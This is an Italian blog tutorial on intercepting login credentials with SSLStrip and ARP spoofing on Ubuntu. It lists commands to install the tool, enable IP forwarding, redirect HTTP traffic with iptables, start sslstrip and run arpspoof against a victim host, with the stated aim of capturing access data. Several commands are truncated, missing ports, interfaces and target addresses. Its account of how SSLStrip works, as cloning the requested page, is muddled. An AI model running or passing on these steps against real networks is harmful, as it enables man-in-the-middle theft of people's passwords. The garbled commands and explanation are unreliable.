Secure Sockets Layer (SSL) è un protocollo crittografico che permette una comunicazione sicura e una integrità dei dati su reti TCP/IP come, ad esempio, internet. SSL cifra la comunicazione dalla sorgente alla destinazione (end-to-end) sul livello di trasporto.
Diverse versioni del protocollo sono ampiamente utilizzate in applicazioni come i browser, l'E-mail, la messaggistica istantanea e il Voice over IP.
Per poter sniffare i dati avremmo bisogno questa volta del tool SLLStrip.
Che è in grado di intercettare le connessioni (trasmissioni) SSL servendosi della tecnica dell’hijacking.
Citazione di: wikipedia
"Il termine hijacking indica una tecnica che consiste nel modificare opportunamente dei pacchetti dei protocolli TCP/IP al fine di dirottare i collegamenti ai propri siti e prenderne il controllo"
- Funzionamento di SSLStrip
Il tool analizza continuamente la rete, captando il traffico SSL appena un host fa una richiesta di una pagina cifrata.
In questo caso il tool crea una copia della pagina richiesta dalla vittima. Quest’ultima verrà quindi dirottata sulla pagina clonata nella quale inserirà i propri dati di accesso, e cosi riceviamo i dati.
Il tool è scritto in Python.
Ora proveremo su Ubuntu.
Innanzitutto installiamo i software di cui ha bisogno il tool per fungere, digitiamo sul terminale:
Codice:
sudo apt-get install python python-twisted-web dsniff
Adesso scarichiamo il file contente SSLStrip cliccando qui sulla Scrivania. Digitamo quindi sul terminale:
Codice:
cd Scrivania
poi
Codice:
tar zxvf sslstrip-0.6.tar.gz
poi
Codice:
cd sslstrip-0.6
poi
Codice:
sudo python ./setup.py install
- Attacco con SSLStrip
Mandiamo la scheda di rete in forwarding mode digitando:
Codice:
sudo su echo "1" > /proc/sys/net/ipv4/ip_forward
Settiamo le iptables in maniera da reindirizzare il traffico HTTP verso SSLStrip digitando:
Codice:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
Avviamo SSLStrip digitando:
Codice:
python ./sslstrip.py -l
Alle precedenti righe andrà sostituito
Abbiamo finito, ora ci basta avviare un ARP Spoof per obbligare la rete a reindirizzare il traffico verso l'host dell'attacker.
Per fare ciò apriamo un altro terminale lasciando aperto il precedente.
Digitiamo sul nuovo terminale:
Codice:
arpspoof -i-t
Al posto di
A questo punto lo script inizierà a lavorare secondo il procedimento accennato sopra catturando i dati di accesso.
Nessun commento:
Posta un commento